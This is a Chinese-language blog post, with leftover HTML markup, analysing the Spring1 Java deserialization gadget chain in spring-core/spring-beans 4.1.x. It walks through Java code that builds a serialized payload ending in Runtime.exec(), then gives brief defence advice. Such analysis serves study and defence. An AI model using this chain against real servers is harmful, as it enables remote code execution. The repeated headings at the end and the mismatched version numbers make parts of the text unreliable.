Java反序列化漏洞分析：Spring1链详解<\/h1>

一、漏洞概述<\/h2>
Spring1链是Java反序列化漏洞中的一条经典利用链，影响以下版本：<\/p>
spring-core: 4.1.4.RELEASE<\/li>
spring-beans: 4.1.4.RELEASE<\/li> <\/ul>
二、环境准备<\/h2>

依赖配置<\/h3>
<!-- https:\/\/mvnrepository.com\/artifact\/org.springframework\/spring-core --><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-core<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>4.1.1.RELEASE<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span>
<\/span><\/span><!-- https:\/\/mvnrepository.com\/artifact\/org.springframework\/spring-beans --><\/span>
<\/span><\/span><dependency><\/span>
<\/span><\/span>    <groupId><\/span>org.springframework<\/groupId><\/span>
<\/span><\/span>    <artifactId><\/span>spring-beans<\/artifactId><\/span>
<\/span><\/span>    <version><\/span>4.1.1.RELEASE<\/version><\/span>
<\/span><\/span><\/dependency><\/span>
<\/span><\/span><\/code><\/pre>三、关键类分析<\/h2>
1. MethodInvokeTypeProvider<\/h3>
位于org.springframework.core.SerializableTypeWrapper.MethodInvokeTypeProvider<\/code>，实现了TypeProvider<\/code>接口，可序列化。<\/p>
关键方法：readObject<\/strong><\/p>

调用ReflectionUtils.findMethod()<\/code>，参数为provider.getType().getClass()<\/code>和methodName<\/code><\/li>
调用ReflectionUtils.invokeMethod()<\/code>反射执行找到的方法<\/li>
<\/ol>
2. ObjectFactoryDelegatingInvocationHandler<\/h3>
位于org.springframework.beans.factory.support.AutowireUtils.ObjectFactoryDelegatingInvocationHandler<\/code>，实现了Serializable<\/code>和InvocationHandler<\/code>接口。<\/p>
关键特性：<\/strong><\/p>

代理时会调用ObjectFactory<\/code>的getObject<\/code>方法返回实例<\/li>
用于Method<\/code>的反射调用<\/li>
<\/ul>
3. AnnotationInvocationHandler<\/h3>
位于sun.reflect.annotation.AnnotationInvocationHandler<\/code>。<\/p>
关键特性：<\/strong><\/p>

通过memberValues<\/code>存储方法名与返回值的映射<\/li>
代理类方法调用时，会根据方法名从memberValues<\/code>中获取返回值<\/li>
<\/ul>
四、利用链分析<\/h2>
完整Gadget Chain：<\/p>
ObjectInputStream.readObject()
   SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()
      SerializableTypeWrapper.TypeProvider(Proxy).getType()
         AnnotationInvocationHandler.invoke()
            HashMap.get()
      ReflectionUtils.findMethod()
      SerializableTypeWrapper.TypeProvider(Proxy).getType()
         AnnotationInvocationHandler.invoke()
            HashMap.get()
      ReflectionUtils.invokeMethod()
         Method.invoke()
            Templates(Proxy).newTransformer()
               AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()
                  ObjectFactory(Proxy).getObject()
                     AnnotationInvocationHandler.invoke()
                        HashMap.get()
                  Method.invoke()
                     TemplatesImpl.newTransformer()
                        TemplatesImpl.getTransletInstance()
                           TemplatesImpl.defineTransletClasses()
                              TemplatesImpl.TransletClassLoader.defineClass()
                                 Pwner*(Javassist-generated).<static init>
                                    Runtime.exec()
<\/code><\/pre>
五、详细利用步骤<\/h2>
1. 构造恶意TemplatesImpl<\/h3>
TemplatesImpl tmpl =<\/span> Util.<\/span>SeralizeUtil<\/span>.<\/span>generateTemplatesImpl<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>2. 代理ObjectFactory.getObject方法<\/h3>
Class<?><\/span> c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor<?><\/span> constructor =<\/span> c.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>HashMap<<\/span>String,<\/span> Object><\/span> map =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"getObject"<\/span>,<\/span> tmpl);<\/span>
<\/span><\/span>
<\/span><\/span>InvocationHandler invocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> map);<\/span>
<\/span><\/span>
<\/span><\/span>ObjectFactory<?><\/span> factory =<\/span> (<\/span>ObjectFactory<?>)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>        ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span> new<\/span> Class[]{<\/span>ObjectFactory.<\/span>class<\/span>},<\/span> invocationHandler);<\/span>
<\/span><\/span><\/code><\/pre>3. 构造ObjectFactoryDelegatingInvocationHandler<\/h3>
Class<?><\/span> clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor<?><\/span> ofdConstructor =<\/span> clazz.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>ofdConstructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>InvocationHandler ofdHandler =<\/span> (<\/span>InvocationHandler)<\/span> ofdConstructor.<\/span>newInstance<\/span>(<\/span>factory);<\/span>
<\/span><\/span><\/code><\/pre>4. 代理Type和Templates接口<\/h3>
Type typeTemplateProxy =<\/span> (<\/span>Type)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span>
<\/span><\/span>        new<\/span> Class[]{<\/span>Type.<\/span>class<\/span>,<\/span> Templates.<\/span>class<\/span>},<\/span> ofdHandler);<\/span>
<\/span><\/span><\/code><\/pre>5. 代理TypeProvider.getType方法<\/h3>
HashMap<<\/span>String,<\/span> Object><\/span> map2 =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>map2.<\/span>put<\/span>(<\/span>"getType"<\/span>,<\/span> typeTemplateProxy);<\/span>
<\/span><\/span>
<\/span><\/span>InvocationHandler newInvocationHandler =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Target.<\/span>class<\/span>,<\/span> map2);<\/span>
<\/span><\/span>
<\/span><\/span>Class<?><\/span> typeProviderClass =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$TypeProvider"<\/span>);<\/span>
<\/span><\/span>Object typeProviderProxy =<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>ClassLoader.<\/span>getSystemClassLoader<\/span>(),<\/span>
<\/span><\/span>        new<\/span> Class[]{<\/span>typeProviderClass},<\/span> newInvocationHandler);<\/span>
<\/span><\/span><\/code><\/pre>6. 构造MethodInvokeTypeProvider<\/h3>
Class<?><\/span> clazz2 =<\/span> Class.<\/span>forName<\/span>(<\/span>"org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider"<\/span>);<\/span>
<\/span><\/span>Constructor<?><\/span> cons =<\/span> clazz2.<\/span>getDeclaredConstructors<\/span>()[<\/span>0<\/span>];<\/span>
<\/span><\/span>cons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object objects =<\/span> cons.<\/span>newInstance<\/span>(<\/span>typeProviderProxy,<\/span> Object.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"toString"<\/span>),<\/span> 0<\/span>);<\/span>
<\/span><\/span>Field field =<\/span> clazz2.<\/span>getDeclaredField<\/span>(<\/span>"methodName"<\/span>);<\/span>
<\/span><\/span>field.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>field.<\/span>set<\/span>(<\/span>objects,<\/span> "newTransformer"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>六、漏洞触发流程<\/h2>

反序列化入口：MethodInvokeTypeProvider.readObject()<\/code><\/li>
调用provider.getType()<\/code>触发第一个AnnotationInvocationHandler<\/code>代理<\/li>
ReflectionUtils.findMethod()<\/code>查找newTransformer<\/code>方法<\/li>
ReflectionUtils.invokeMethod()<\/code>触发ObjectFactoryDelegatingInvocationHandler.invoke()<\/code><\/li>
调用objectFactory.getObject()<\/code>触发第二个AnnotationInvocationHandler<\/code>代理<\/li>
返回TemplatesImpl<\/code>实例并反射调用newTransformer()<\/code><\/li>
最终执行恶意代码<\/li>
<\/ol>
七、技术要点总结<\/h2>


多层代理嵌套<\/strong>：<\/p>

使用AnnotationInvocationHandler<\/code>代理TypeProvider<\/code>和ObjectFactory<\/code><\/li>
使用ObjectFactoryDelegatingInvocationHandler<\/code>连接两个代理层<\/li>
<\/ul>
<\/li>

类型欺骗<\/strong>：<\/p>

创建同时实现Type<\/code>和Templates<\/code>接口的代理类<\/li>
确保getType()<\/code>返回的类能找到newTransformer<\/code>方法<\/li>
<\/ul>
<\/li>

反射控制<\/strong>：<\/p>

通过反射设置MethodInvokeTypeProvider<\/code>的methodName<\/code>字段<\/li>
控制方法调用的返回值链<\/li>
<\/ul>
<\/li>
<\/ol>
八、防御建议<\/h2>

升级Spring框架到安全版本<\/li>
使用安全的反序列化机制，如白名单过滤<\/li>
监控和限制反序列化操作<\/li>
<\/ol>
九、参考资源<\/h2>

su18.org - ysoserial-su18-3<\/a><\/li>
ch1e.cn - spring系列反序列化链<\/a><\/li>
wooyun.js.org - Java反序列化工具ysoserial分析<\/a><\/li>
tttang.com - 反序列化漏洞分析<\/a><\/li>
<\/ol>
Java反序列化漏洞分析：Spring1链详解<\/h1>

二、环境准备<\/h2>

三、关键类分析<\/h2>

五、详细利用步骤<\/h2>

九、参考资源<\/h2> su18.org - ysoserial-su18-3<\/a><\/li> ch1e.cn - spring系列反序列化链<\/a><\/li> wooyun.js.org - Java反序列化工具ysoserial分析<\/a><\/li> tttang.com - 反序列化漏洞分析<\/a><\/li> <\/ol>

九、参考资源<\/h2>

su18.org - ysoserial-su18-3<\/a><\/li>
ch1e.cn - spring系列反序列化链<\/a><\/li>
wooyun.js.org - Java反序列化工具ysoserial分析<\/a><\/li>
tttang.com - 反序列化漏洞分析<\/a><\/li> <\/ol>
